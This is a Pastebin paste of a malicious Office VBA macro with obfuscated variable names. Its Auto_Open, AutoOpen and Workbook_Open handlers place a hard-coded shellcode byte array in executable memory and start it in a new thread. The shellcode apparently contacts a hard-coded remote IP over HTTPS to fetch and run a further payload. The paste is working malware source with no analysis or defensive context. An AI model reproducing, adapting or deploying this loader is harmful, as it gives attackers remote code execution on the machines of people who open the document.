Advertisement
Guest User

Untitled

a guest
Aug 20th, 2018
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
  1. #If Vba7 Then
  2. Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Qoyb As Long, ByVal Xegx As Long, ByVal Qtiynpl As LongPtr, Weqfpni As Long, ByVal Kfhfejaps As Long, Ahsok As Long) As LongPtr
  3. Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Qjgnupbsb As Long, ByVal Ezlrltf As Long, ByVal Zcg As Long, ByVal Dtcoewk As Long) As LongPtr
  4. Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Xmjqsefsc As LongPtr, ByRef Rjvbwdowi As Any, ByVal Lql As Long) As LongPtr
  5. #Else
  6. Private Declare Function CreateThread Lib "kernel32" (ByVal Qoyb As Long, ByVal Xegx As Long, ByVal Qtiynpl As Long, Weqfpni As Long, ByVal Kfhfejaps As Long, Ahsok As Long) As Long
  7. Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Qjgnupbsb As Long, ByVal Ezlrltf As Long, ByVal Zcg As Long, ByVal Dtcoewk As Long) As Long
  8. Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Xmjqsefsc As Long, ByRef Rjvbwdowi As Any, ByVal Lql As Long) As Long
  9. #EndIf
  10.  
  11. Sub Auto_Open()
  12. Dim Ylbtmxdf As Long, Edr As Variant, Mphzfzgq As Long
  13. #If Vba7 Then
  14. Dim Vbuplqxm As LongPtr, Aku As LongPtr
  15. #Else
  16. Dim Vbuplqxm As Long, Aku As Long
  17. #EndIf
  18. Edr = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1,199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81,139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
  19. 207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,255,213,49,219,83,83,83,83, _
  20. 83,104,58,86,121,167,255,213,83,83,106,3,83,83,104,187,1,0,0,232,198,0,0,0,47,79,119,65,114,86,110,52,68,53,66,65,54,79,84,115,52,89,85,75,113,100,119,107,65,110,71,103,69,115,106,103,109,82,114,95,72,109,77,50,100,115,85,45,50,119,107,106,113,121,118,56,90,76,0,80, _
  21. 104,87,137,159,198,255,213,137,198,83,104,0,50,224,132,83,83,83,87,83,86,104,235,85,46,59,255,213,150,106,10,95,104,128,51,0,0,137,224,106,4,80,106,31,86,104,117,70,158,134,255,213,83,83,83,83,86,104,45,6,24,123,255,213,133,192,117,20,104,136,19,0,0,104,68,240,53,224,255,213, _
  22. 79,117,205,232,73,0,0,0,106,64,104,0,16,0,0,104,0,0,64,0,83,104,88,164,83,229,255,213,147,83,83,137,231,87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,207,139,7,1,195,133,192,117,229,88,195,95,232,107,255,255,255,51,49,46,50,50,48,46,49,55,46,53,56, _
  23. 0,187,240,181,162,86,106,0,83,255,213)
  24.  
  25. Vbuplqxm = VirtualAlloc(0, UBound(Edr), &H1000, &H40)
  26. For Mphzfzgq = LBound(Edr) To UBound(Edr)
  27. Ylbtmxdf = Edr(Mphzfzgq)
  28. Aku = RtlMoveMemory(Vbuplqxm + Mphzfzgq, Ylbtmxdf, 1)
  29. Next Mphzfzgq
  30. Aku = CreateThread(0, 0, Vbuplqxm, 0, 0, 0)
  31. End Sub
  32. Sub AutoOpen()
  33. Auto_Open
  34. End Sub
  35. Sub Workbook_Open()
  36. Auto_Open
  37. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement